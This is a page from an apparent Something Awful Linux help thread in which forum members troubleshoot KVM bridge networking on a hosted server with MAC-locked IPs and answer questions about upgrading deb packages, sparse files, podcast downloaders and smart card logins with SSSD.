Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us $3,400 per month for bandwidth bills alone, and since we don't believe in shoving popup ads to our registered users, we try to make the money back through forum registrations.
  • Post
  • Reply
The Milkman
Jun 22, 2003

No one here is alone,
satellites in every home


Lipstick Apathy

There's also the selenium standalone docker images if you would like a different type of headache

https://hub.docker.com/u/selenium/

Adbot
ADBOT LOVES YOU

D. Ebdrup
Mar 13, 2009
Probation
Can't post for 3 hours!


I don't know how I missed it until today, but I just found out about ncspot - it's a Spotify TUI client, like many others, but this one behaves not unlike ncmpc so it's just about infinitely better than spt which I was using up until now.
Another upshot is that ncspot doesn't have problems shuffling my giant playlists unlike spt, which was frustrating because I like to queue up music I like instead of what Spotify wants to recommend.

So if you hadn't heard about it and find you have the same problems, maybe check it out? It's in FreeBSD Ports, so it should be in a repo near you.

Tea Bone
Feb 18, 2011

I'm going for gasps.

I have a dedicated remote server running Ubuntu server 20.04 with 6 public IPs assigned to it.
I'm trying to set up some webservers inside KVMs and assign each guest it's own IP. I assume the way I want to do this is with a standard network bridge (without NAT).
So far I've managed to get the Bridge working on the host with netplan, but can't seem to get the guests to connect.

My netplan looks like this:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            interfaces: [eth0]
    version: 2
I've also tried it with dhcp and manual addresses:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            addresses: [xxx.xxx.x.1/32, xxx.xxx.x.2/32, xxx.xxx.x.3/32, xxx.xxx.x.4/32, xxx.xxx.x.5/32, xxx.xxx.x.6/32]
            interfaces: [eth0]
    version: 2
but again the guests wont connect and all ips end up pointing to the hosts. (the IPs arent necessarily in series like above implies, I don't know if this makes a difference?)

This is a bit out of my wheel house so I'd really appreciate some pointers in the right direction.

Shaocaholica
Oct 29, 2002

Fig. 5E


This seems like a dumb question for 2020 but deb packages have a concept of how to update an existing install right? For instance discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my debian distro to install this package without manually uninstalling or 'preparing' the previous install right? Smart people have built that logic into the newer deb package right?

CaptainSarcastic
Jul 6, 2013

HAIL SATAN


Shaocaholica posted:

This seems like a dumb question for 2020 but deb packages have a concept of how to update an existing install right? For instance discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my debian distro to install this package without manually uninstalling or 'preparing' the previous install right? Smart people have built that logic into the newer deb package right?

The package manager should handle that. I think Debian uses apt? I haven't run a Debian-based distro in years but I remember apt being a perfectly reasonable package manager. One RPM distro I used to run used apt for package management, and it was fine.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

I have a dedicated remote server running Ubuntu server 20.04 with 6 public IPs assigned to it.
I'm trying to set up some webservers inside KVMs and assign each guest it's own IP. I assume the way I want to do this is with a standard network bridge (without NAT).
So far I've managed to get the Bridge working on the host with netplan, but can't seem to get the guests to connect.

My netplan looks like this:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            interfaces: [eth0]
    version: 2
I've also tried it with dhcp and manual addresses:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            addresses: [xxx.xxx.x.1/32, xxx.xxx.x.2/32, xxx.xxx.x.3/32, xxx.xxx.x.4/32, xxx.xxx.x.5/32, xxx.xxx.x.6/32]
            interfaces: [eth0]
    version: 2
but again the guests wont connect and all ips end up pointing to the hosts. (the IPs arent necessarily in series like above implies, I don't know if this makes a difference?)

This is a bit out of my wheel house so I'd really appreciate some pointers in the right direction.

A bridge is a Layer2 device, it can have an IP address but does not need it ( a transparent bridge ).
What you probably want is one IP address on the bridge for management, and the VMs use the bridge as a "shared device". Inside the VMs ( on the actual running OS inside the VM ) you configure their IP configuration with the provided IP addresses.

Docker might also be something you could take a look at. There are a lot of ways to get this running. A reverse proxy might also be a thing that could work.

Mr Shiny Pants fucked around with this message at 06:03 on Sep 6, 2020

Tea Bone
Feb 18, 2011

I'm going for gasps.

Thanks for replying. I think my understanding of bridges might be off and I need to do some reading up. No matter what I try the VMs just can't seem to see the bridge, even if I try assigning the IPs statically from within the VM.

For the time being I think I'm goign to go down the reverse proxy route since that's something I'm more comfortable with and I'm starting to come up against time constraints.

MrPablo
Mar 21, 2003



Shaocaholica posted:

This seems like a dumb question for 2020 but deb packages have a concept of how to update an existing install right? For instance discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my debian distro to install this package without manually uninstalling or 'preparing' the previous install right? Smart people have built that logic into the newer deb package right?

Short answer: You should just be able to install the new deb file without manually uninstalling the old one, like so:

code:
sudo dpkg -i /path/to/file.deb
Longer answer:

Under the hood, a deb file is just an ar archive which contains a pair of tarballs and a few other bits of information.

The tarballs inside a deb file are:

  • control.tar.{xz,gz}: Package control data, including the package metadata and maintainer scripts
  • data.tar.{gz,xz}: Actual package files

A well-formed deb file typically contains a maintainer script to handle upgrades (see section 6.5 of this page for details). As part of the installation process, dpkg will unpack the file from the update and run the maintainer scripts as-needed.

With that in mind, assuming you have all of the dependencies, and assuming the Discord folks are building their deb files correctly, a "dpkg -i" should be sufficient to upgrade from an old version of Discord to a newer version.

Here's an example of me updating gh from version 0.11.0 to 0.11.1 with dpkg, without uninstalling the 0.11.0 deb:

code:
pabs@flex:~> sudo dpkg -i Downloads/gh_0.11.1_linux_amd64.deb 
[sudo] password for pabs: 
(Reading database ... 360346 files and directories currently installed.)
Preparing to unpack .../gh_0.11.1_linux_amd64.deb ...
Unpacking gh (0.11.1) over (0.11.0) ...
Setting up gh (0.11.1) ...
Processing triggers for man-db (2.9.3-2) ...
pabs@flex:~> 
Added bonus: here's an example of me peeking through the contents of a random deb file to look at the metadata (the "control" file in the control.tar.xz tarball) and one of the maintainer scripts:

code:
pabs@flex:~/Downloads/tmp> ar t debianutils_4.9.1_amd64.deb 
debian-binary
control.tar.xz
data.tar.xz
pabs@flex:~/Downloads/tmp> ar x debianutils_4.9.1_amd64.deb control.tar.xz && mkdir control && cd control && tar xf ../control.tar.xz && ls
control  md5sums  postinst  postrm
pabs@flex:~/Downloads/tmp/control> cat control 
Package: debianutils
Version: 4.9.1
Architecture: amd64
Essential: yes
Maintainer: Clint Adams <clint@debian.org>
Installed-Size: 230
Pre-Depends: libc6 (>= 2.15)
Section: utils
Priority: required
Multi-Arch: foreign
Description: Miscellaneous utilities specific to Debian
 This package provides a number of small utilities which are used
 primarily by the installation scripts of Debian packages, although
 you may use them directly.
 .
 The specific utilities included are:
 add-shell installkernel ischroot remove-shell run-parts savelog
 tempfile which
pabs@flex:~/Downloads/tmp/control> cat postinst 
#! /bin/sh -e

if test -z "$2" && test ! -f /etc/shells
then
        cp -p /usr/share/debianutils/shells /etc/shells
fi

case "$1" in
    configure)
    if [ ! -e /usr/bin/which ]
    then
	    ln -s /bin/which /usr/bin/which
    fi
    ;;

    abort-upgrade|abort-remove|abort-deconfigure)

    ;;

    *)
        echo "postinst called with unknown argument \`$1'" >&2
        exit 1
    ;;
esac
pabs@flex:~/Downloads/tmp/control> 

waffle iron
Jan 16, 2004


Shaocaholica posted:

This seems like a dumb question for 2020 but deb packages have a concept of how to update an existing install right? For instance discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my debian distro to install this package without manually uninstalling or 'preparing' the previous install right? Smart people have built that logic into the newer deb package right?

Other people have answered it better, but one thing I will note is that some packages like Google Chrome will install a package source file in /etc/apt/sources.list.d/ so that the package manager (apt, apt-get, aptitude, Synaptic, GNOME Software, etc) will automatically update it. It doesn't look like Discord does that. Some people will install closed source packages with Snap or Flatpak so that there are automatic updates and the dependencies are sandboxed. Personally, I use Steam with Flatpak because it manages all the i386 dependencies.

Tea Bone
Feb 18, 2011

I'm going for gasps.

Tea Bone posted:

Thanks for replying. I think my understanding of bridges might be off and I need to do some reading up. No matter what I try the VMs just can't seem to see the bridge, even if I try assigning the IPs statically from within the VM.

For the time being I think I'm goign to go down the reverse proxy route since that's something I'm more comfortable with and I'm starting to come up against time constraints.

Okay, I think I've made some headway with the bridge situation.

I switched over to Centos and enabled a bridge via cockpit.
code:
bridge link show
shows eth0 and vnet0. I'm assuming vnet0 is the VM since it doesn't show up until I boot up KVM. I'm still unable to get a connection but the fact something is showing up on the bridge makes me think I'm closer.

other people
Jun 27, 2004
Associate Christ

vnet0 is the tuntap virtual.device which is the hypervisor's representation of a guest virtual NIC. put a packet in and it arrives in the guest. wheb the guest NIC sends a packet it pops out of the vnetX on the hypervisor. The vnetX name is not special it is just the style libvirt defaults to.

virsh domiflist or something like that will show which vnetX is connected to which guest.

You'd have to create a bridge on the hypervisor and attach both a "real" interface and some guest vnetX device(s) to join their broadcast domains. This means from the guest nic point of view it is now connected to the same L2 network as the hypervisor's physical nic (whichever one you plugged into the bridge). Just think of the bridge as being like a virtual switch. If you want the hypervisor to also have an L3 address (IPv4 and/or IPv6 address) on this network then you assign it to the bridge interface itself (br0 or whatever).

Tea Bone
Feb 18, 2011

I'm going for gasps.

other people posted:

vnet0 is the tuntap virtual.device which is the hypervisor's representation of a guest virtual NIC. put a packet in and it arrives in the guest. wheb the guest NIC sends a packet it pops out of the vnetX on the hypervisor. The vnetX name is not special it is just the style libvirt defaults to.

virsh domiflist or something like that will show which vnetX is connected to which guest.

You'd have to create a bridge on the hypervisor and attach both a "real" interface and some guest vnetX device(s) to join their broadcast domains. This means from the guest nic point of view it is now connected to the same L2 network as the hypervisor's physical nic (whichever one you plugged into the bridge). Just think of the bridge as being like a virtual switch. If you want the hypervisor to also have an L3 address (IPv4 and/or IPv6 address) on this network then you assign it to the bridge interface itself (br0 or whatever).

Okay, I've read through this and I *think* this is what I'm doing.

I've created the bridge network and connected my eth0 to it. I've then applied this bridge network to virt-manager. It looks like both are communicating with the bridge. The host with the physical nic is still receiving network connectivity. The guest machine isn't connecting, but when I turn it on I can see virt0 light up here:

and send/receive a few KBs. Is that what you mean by creating the bridge on the hypervisor and attaching both a real interface and a guest one?

Currently, the bridge is still using DHCP and receiving only 1 IP. I was under the impression this would still work for confirming that both devices connect?

All I want to do is have my VMs act like real machines with static IPs. Even if I get this bridge thing working am I going about it completely the wrong way? As I said in my OP, this is a little out of my area, bridging felt like the correct way of doing things but I could be misguided. There's also some level of sunk cost fallacy there, I should have given up and tried something else hours ago but feel like I've been on the edge of breaking through.

other people
Jun 27, 2004
Associate Christ

How is IP addressing assigned in this network? Do you have to set the IP in the guest statically or does the network do DHCP? From that pic it *appears* the guest should be good to go.

Of course, the network might shutdown the hypervisor physdev if it sees STP that the bridge is probably generating. Or, the DHCP server might only hand out leases to specific MACs. So while you might have the basic connectivity for the guest done in a valid way it still might not work due to some outside policy.

The easiest way to find out would be to ask .

Or I guess a basic step is assuming the guest and the hypervisor bridge both have an IP then see if they can ping each other because that should work regardless of any policy of the physical network.

Tea Bone
Feb 18, 2011

I'm going for gasps.

I've tried both static and dhcp, neither seem to work. I've spoken to the support at the server farm and they said there's no policy on their side which should stop it so that's not the issue.

The guest isn't getting an IP (at least that I can see), if I put something in manually it shows up with "ip a"/"ifconfig" but any attempt to ping anything (except 0.0.0.0/127.0.0.1 but I assume that's from the loopback) just gets:
"connect: Network is unreachable"

It's entirely possible that I'm setting the static details up wrong, my IP pool isn't sequential, it's something akin to:
1.1.2.1 <- this is the bridge's IP
1.1.4.10
1.1.5.20
2.2.4
1.1.5.5
1.1.3.20

So I'm not too sure how to set up the netmask.

edit: The current network/interfaces on the guest looks like this:
code:
auto lo
face lo init looopback

auto eth0
face eth0 init static
	address 1.1.5.20
	netmask 255.255.255.255
	network 127.0.0.1
	broadcast 127.0.0.1
I'm pretty certain the network and broadcast are wrong, that's just one iteration of different addresses I've tried them on (also tried 0.0.0.0, 1.1.5.20, 1.1.2.1)

edit edit: I've just tried pinging 1.1.5.20 from the guest (it's own manually assigned IP) and it gives a response. Again though, I'm assuming that's just becasuse the network is it's home IP

Triple edit: In a moment of desperation I called the support team again and the agent this time straight away confirmed for me that the IPs are bound to a MAC address so that's why it's not working. 3 days well spent

Tea Bone fucked around with this message at 22:33 on Sep 6, 2020

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

I've tried both static and dhcp, neither seem to work. I've spoken to the support at the server farm and they said there's no policy on their side which should stop it so that's not the issue.

The guest isn't getting an IP (at least that I can see), if I put something in manually it shows up with "ip a"/"ifconfig" but any attempt to ping anything (except 0.0.0.0/127.0.0.1 but I assume that's from the loopback) just gets:
"connect: Network is unreachable"

It's entirely possible that I'm setting the static details up wrong, my IP pool isn't sequential, it's something akin to:
1.1.2.1 <- this is the bridge's IP
1.1.4.10
1.1.5.20
2.2.4
1.1.5.5
1.1.3.20

So I'm not too sure how to set up the netmask.

edit: The current network/interfaces on the guest looks like this:
code:
auto lo
face lo init looopback

auto eth0
face eth0 init static
	address 1.1.5.20
	netmask 255.255.255.255
	network 127.0.0.1
	broadcast 127.0.0.1
I'm pretty certain the network and broadcast are wrong, that's just one iteration of different addresses I've tried them on (also tried 0.0.0.0, 1.1.5.20, 1.1.2.1)

edit edit: I've just tried pinging 1.1.5.20 from the guest (it's own manually assigned IP) and it gives a response. Again though, I'm assuming that's just becasuse the network is it's home IP

Triple edit: In a moment of desperation I called the support team again and the agent this time straight away confirmed for me that the IPs are bound to a MAC address so that's why it's not working. 3 days well spent
You probably need to give them the MAC address in advance right?

other people
Jun 27, 2004
Associate Christ

Sorry but your IP configuration is totally bunk.

127.0.0.1 are not valid network nor broadcast addresses. And a netmask of 255.255.255.255 defines a network of 1 host; it's not correct.

The network address is the first address in address range and the broadcast address is the last. Typically you don't have to bother giving these in a config file because they are so easy for the system to infer from the IP and netmask/prefix but that is not a RHEL/fedora style config file so I dunno what your network service is doing

Anyway, for example, if ur IP address is 192.168.122.10/24 (a netmask of 255.255.255.0) then the network address is 192.168.122.0 and the broadcast address is 192.168.122.255.


You must ask your support people what the netmask (aka prefix) is for the network. You can do some things to try to infer it but that is prone to error and if you get it wrong you may run into connectivity issues when your system thinks it can reach some hosts directly via L2 when it really can't, etc..

For 1.1.2.1 and 1.1.5.20 to be part of the same network the netmask would have to be at least 255.255.248.0 (/21). That's totally plausible but it could be even bigger and you wouldn't know without asking. Using that as an example, the network would be 1.1.0.0/21 with a broadcast address of 1.1.7.255.

If your hypervisor can get at least one IP via DHCP you can peek at the lease details and glean the netmask, DNS, etc which would give you all you need to know how to define your static addressing (just change out the IP as needed).

Tea Bone
Feb 18, 2011

I'm going for gasps.

other people posted:

Sorry but your IP configuration is totally bunk.

127.0.0.1 are not valid network nor broadcast addresses. And a netmask of 255.255.255.255 defines a network of 1 host; it's not correct.

The network address is the first address in address range and the broadcast address is the last. Typically you don't have to bother giving these in a config file because they are so easy for the system to infer from the IP and netmask/prefix but that is not a RHEL/fedora style config file so I dunno what your network service is doing

Anyway, for example, if ur IP address is 192.168.122.10/24 (a netmask of 255.255.255.0) then the network address is 192.168.122.0 and the broadcast address is 192.168.122.255.


You must ask your support people what the netmask (aka prefix) is for the network. You can do some things to try to infer it but that is prone to error and if you get it wrong you may run into connectivity issues when your system thinks it can reach some hosts directly via L2 when it really can't, etc..

For 1.1.2.1 and 1.1.5.20 to be part of the same network the netmask would have to be at least 255.255.248.0 (/21). That's totally plausible but it could be even bigger and you wouldn't know without asking. Using that as an example, the network would be 1.1.0.0/21 with a broadcast address of 1.1.7.255.

If your hypervisor can get at least one IP via DHCP you can peek at the lease details and glean the netmask, DNS, etc which would give you all you need to know how to define your static addressing (just change out the IP as needed).

Thanks for your help. Yeah, I expected that my config was bad and part of the problem. The 255.255.255.255 was the netmask given to me by the support team, and looking at the working hypervisors lease, the netmask is indeed 255.255.255.255 with a broadcast of 0.0.0.0, I can't seem to find the network address, but I'm assuming from your explanation that network is the first address in the range it should be the servers own IP (since the mask is 32 bits), but then surely the broadcast should also be that?

I've checked and confirmed these connections work on the hypervisor when set manually rather than DHCP and it's still able to connect.

I suspect there's something more going on with the config on the server farms side which is even further outside of my understanding. For the time being I've setup a reverse proxy to just pass connections through to the VMs since I need this working for tomorrow. I might try to come back to it in a week or so if I feel like punishing myself but the fact that IP addresses are locked to the hosts MAC probably makes this a non starter right?

other people
Jun 27, 2004
Associate Christ

What does the routing table look like on the hypervisor? The neighbour table?

# ip route
# ip neigh


Afaik, if you assign an IP with a /32 then the kernel will not create a prefix route and then your routing table will be completely empty unless you've manually added something to it. And then no duh you won't be able to reach anything remote.

Surely they gave you some gateway IP address? I suppose if they insist on the /32 prefix then something like this should work:

# ip addr add 1.1.5.20/32 dev eth0
# ip route add <GATEWAYIP> dev eth0
# ip route add default via <GATEWAYIP>


That will "force" your system to arp for the gateway and assuming that resolves then your system will transmit *any* packet destined for a remote IP to the gateway at layer 2. I guess this is some level of security.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

Thanks for your help. Yeah, I expected that my config was bad and part of the problem. The 255.255.255.255 was the netmask given to me by the support team, and looking at the working hypervisors lease, the netmask is indeed 255.255.255.255 with a broadcast of 0.0.0.0, I can't seem to find the network address, but I'm assuming from your explanation that network is the first address in the range it should be the servers own IP (since the mask is 32 bits), but then surely the broadcast should also be that?

I've checked and confirmed these connections work on the hypervisor when set manually rather than DHCP and it's still able to connect.

I suspect there's something more going on with the config on the server farms side which is even further outside of my understanding. For the time being I've setup a reverse proxy to just pass connections through to the VMs since I need this working for tomorrow. I might try to come back to it in a week or so if I feel like punishing myself but the fact that IP addresses are locked to the hosts MAC probably makes this a non starter right?

Surely you can get them to change the MACs? Get the MAC addresses from KVM and have them change the assigned IPs.

Or spoof the MACs using KVM if you are sure there are no machines listening with the spoofed MAC anymore.

other people
Jun 27, 2004
Associate Christ

Sorry I missed the bit about the IP addresses being locked to specific MAC addresses. You have six IPs, are they all currently "locked" to the same MAC or what?

Give them the MACs of your VMs and ask them to change the associations?

Or you could mangle all the packets in/out with nftables so every packet leaves the hypervisor with the same MAC but it would be kinda lame to have to do that. At that point you may as well assign every IP to the hypervisor and use rules to NAT to whichever (isolated) VM per IP.

Tea Bone
Feb 18, 2011

I'm going for gasps.

Mr Shiny Pants posted:

Surely you can get them to change the MACs? Get the MAC addresses from KVM and have them change the assigned IPs.

Or spoof the MACs using KVM if you are sure there are no machines listening with the spoofed MAC anymore.

You would think so, but apparently they can't (or won't) reassign them. It was probably naive of me not to check before purchasing them, but it seemed a logical conclusion that the use of multiple IPs would be for bridging them to VMs.

I considered spoofing the MACs but was low on time and unsure if I was way off base and it wouldn't work. I might give that a try when I'm ready to play around with it again!

Computer viking
May 30, 2011
Now with less breakage.

Is there any halfway reliable way to distinguish sparse vs compressed files from userland? I guess you could try cat-ing it to a new file and see if the on-disk size changes, but that seems overly dumb even for me. On a filesystem without compression you could just use "apparent and on-disk size are different", but that's obviously going to get a lot of false positives if you support both.

And no, I don't have any use for this, I'm just curious.

Computer viking fucked around with this message at 08:19 on Sep 8, 2020

D. Ebdrup
Mar 13, 2009
Probation
Can't post for 3 hours!


Computer viking posted:

Is there any halfway reliable way to distinguish sparse vs compressed files from userland? I guess you could try cat-ing it to a new file and see if the on-disk size changes, but that seems overly dumb even for me. On a filesystem without compression you could just use "apparent and on-disk size are different", but that's obviously going to get a lot of false positives if you support both.

And no, I don't have any use for this, I'm just curious.
One of the cooler things about GNU find is that its printf mode supports the %S format which prints file sparseness, so you can do: (g)find /path/to/directory -type f -printf "%S\t%p\n"
Have a look at the man-page for how exactly it figures things out.

Computer viking
May 30, 2011
Now with less breakage.

Going by the man page, that's (st_blocks * BLOCKSIZE) / st_size, which is a convenient number to have - but I don't think it will distinguish between compressed and sparse files?

Saukkis
May 16, 2003

Unless I'm on the inside curve pointing straight at oncoming traffic the high beams stay on and I laugh at your puny protest flashes.
I am Most Important Man. Most Important Man in the World.

Tea Bone posted:

You would think so, but apparently they can't (or won't) reassign them. It was probably naive of me not to check before purchasing them, but it seemed a logical conclusion that the use of multiple IPs would be for bridging them to VMs.

I considered spoofing the MACs but was low on time and unsure if I was way off base and it wouldn't work. I might give that a try when I'm ready to play around with it again!

What are the network settings of your host server? Those might give you an idea what settings the VMs should have.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

You would think so, but apparently they can't (or won't) reassign them. It was probably naive of me not to check before purchasing them, but it seemed a logical conclusion that the use of multiple IPs would be for bridging them to VMs.

I considered spoofing the MACs but was low on time and unsure if I was way off base and it wouldn't work. I might give that a try when I'm ready to play around with it again!

Huh? This is weird, why won't they? How exactly did you get these IP addresses?

You can use KVM to set a MAC address on a virtual NIC, so that should just work.

D. Ebdrup
Mar 13, 2009
Probation
Can't post for 3 hours!


Tea Bone posted:

about software defined networking and bridges
This is mostly a tangential issue, but it's something you should learn from the get-go because I've met many people who don't understand why their systems run sub-optimally as a result of this quite common misconfiguration.
The only time it's a good idea to set an IP address on a bridge device is when the bridge host needs an IP address, because bridges are meant to be transparent devices and IP addresses are meant to belong to end-points (since TCP is an end-to-end protocol), and network stack code is designed around this concept.
This is also the reason why checksum/large receive/segmentation offloading technically speaking breaks the end-to-end principle of TCP and should be avoided for firwalls, but that's a whole other can of worms.

other people
Jun 27, 2004
Associate Christ

D. Ebdrup posted:

This is mostly a tangential issue, but it's something you should learn from the get-go because I've met many people who don't understand why their systems run sub-optimally as a result of this quite common misconfiguration.
The only time it's a good idea to set an IP address on a bridge device is when the bridge host needs an IP address, because bridges are meant to be transparent devices and IP addresses are meant to belong to end-points (since TCP is an end-to-end protocol), and network stack code is designed around this concept.

Come again?

The linux kernel bridge module in TYOOL 2020 is effectively a virtual switch. When a bridge is created on a system the new virtual switch always begins with one "port" connected and that's the netdev (typically named br0 or whatever) which "plugs" the system into the virtual switch. From the point of view of the packet switching functionality of the bridge module, this port is just like any other that it may choose to forward or flood frames to. Whether you assign an IP address to it or not has no impact on performance of frames traversing the bridge.

Unicast frames hitting the bridge which do not have a destination layer 2 address matching the br0 interface are not going to be delivered to it. Frames which do not match anything in the FDB are going to be flooded to all ports, including br0, regardless of whether br0 has an IP assigned. So in the end, whether that device has a layer 3 assigned makes no difference.



Anyway, in Tea Bone's case, it sounds like his system only has a single physical connection to a network so if he wants his hypervisor and its guest's to all be reachable at L3 on that network then a bridge (with IP) on the hypervisor is the most obvious solution. He can't really avoid it without separate physical connections or some pretty wacky packet mangling.

Tea Bone
Feb 18, 2011

I'm going for gasps.

Mr Shiny Pants posted:

Huh? This is weird, why won't they? How exactly did you get these IP addresses?

You can use KVM to set a MAC address on a virtual NIC, so that should just work.

I purchased "Additional IPs" along with the server when I signed up.

As to why they won't, honestly, I don't know. I don't think their support guys are that clear on the matter either since it took me 4 rounds of speaking to them before anyone could even tell me the IPs were locked to a MAC. I should have pushed them on it, but by that time I was just relieved to have an answer why things weren't working. It's a "new" model of service plan with the servers and know they used to change the MACs for the old-style plan so it might just be teething issues their end. I might give them yet another call and try to get to the bottom of this later down the line.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

I purchased "Additional IPs" along with the server when I signed up.

As to why they won't, honestly, I don't know. I don't think their support guys are that clear on the matter either since it took me 4 rounds of speaking to them before anyone could even tell me the IPs were locked to a MAC. I should have pushed them on it, but by that time I was just relieved to have an answer why things weren't working. It's a "new" model of service plan with the servers and know they used to change the MACs for the old-style plan so it might just be teething issues their end. I might give them yet another call and try to get to the bottom of this later down the line.

Sounds like a weird constraint to be honest, especially today when hardware is mostly virtual.

To re-iterate if you get them fixed:

Get one IP on the bridge for management purposes, or another NIC of you have one and leave the bridge as is.
Put VMs using Virtual Machine manager on the shared device. I always just use BR0.
Inside the VM OS put the correct networking information on the NIC that is connected to the BR0 interface.

That should do the trick, I have multiple of these setups running with no problems.

RFC2324
Jun 7, 2012

Http 418


Tea Bone posted:

I purchased "Additional IPs" along with the server when I signed up.

As to why they won't, honestly, I don't know. I don't think their support guys are that clear on the matter either since it took me 4 rounds of speaking to them before anyone could even tell me the IPs were locked to a MAC. I should have pushed them on it, but by that time I was just relieved to have an answer why things weren't working. It's a "new" model of service plan with the servers and know they used to change the MACs for the old-style plan so it might just be teething issues their end. I might give them yet another call and try to get to the bottom of this later down the line.

escalate. they don't have access under the new system, and have management who don't understand the issue

Pablo Bluth
Sep 7, 2007

I've made a huge mistake.


Can anyone recommend a cron-friendly podcast downloader/archiver? I've just tried podget which would do the job if it could do decent file (re)naming.

D. Ebdrup
Mar 13, 2009
Probation
Can't post for 3 hours!


Pablo Bluth posted:

Can anyone recommend a cron-friendly podcast downloader/archiver? I've just tried podget which would do the job if it could do decent file (re)naming.
flexget.

Axe-man
Apr 16, 2005

The product of hundreds of hours of scientific investigation and research.

The perfect meatball.


Clapping Larry

Today I got to feel like a big dummy.

I am using a client that uses internal port 5510, and the client wasn't connecting to the server.

Gave a unique path on my firewall for my port still won't work.

Nmap shows the port closed, assumed it was the router and disabled the firewall completely to the server.

Still, nothing.

Finally did a tracepath to and found it just hitting the server and stopping...

I hadn't started the daemon.

D. Ebdrup
Mar 13, 2009
Probation
Can't post for 3 hours!


Axe-man posted:

Today I got to feel like a big dummy.

I am using a client that uses internal port 5510, and the client wasn't connecting to the server.

Gave a unique path on my firewall for my port still won't work.

Nmap shows the port closed, assumed it was the router and disabled the firewall completely to the server.

Still, nothing.

Finally did a tracepath to and found it just hitting the server and stopping...

I hadn't started the daemon.
netcat has a -z switch that is immeasurably handy for diagnosing this kind of thing remotely.

Adbot
ADBOT LOVES YOU

Sheep
Jul 24, 2003


Anyone using smart card logins with CentOS 8? It seems like the new RedHat recommended method is via SSSD, which is great and all, but I'm pretty much at a loss as to how to convert our old pam_pkcs11-based method from CentOS 7 over. Our situation is pretty simple; if the user is able to open pkcs11:id=%01 then that'd be sufficient for authentication on our end, but I'm not really clear on how to configure that within sssd.conf. I've read the topics on RedHat's IDM section as well as the Access article and nothing I do has been able to get so far as event prompting for PIN.

Our CentOS 7 setup is just pam_pkcs11 with a basic ms mapper and works without any issue at all.

Already confirmed I can query the card and pull certificates via pcsc_scan/p11tool so it's not a reader/card issue, CA certificates have been added to nssdb, and sssd.conf does have pam_cert_auth set to True. It's probably down to the certmap matchrule but even setting it appropriately doesn't seem to help. SSSD's logs are entirely unhelpful even at elevated debug levels and don't even mention the card at all.

Edit: the certmaps page on sssd.io has been the most help as it provides instructions on rewriting the ms mapper.

Sheep fucked around with this message at 01:47 on Sep 16, 2020

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply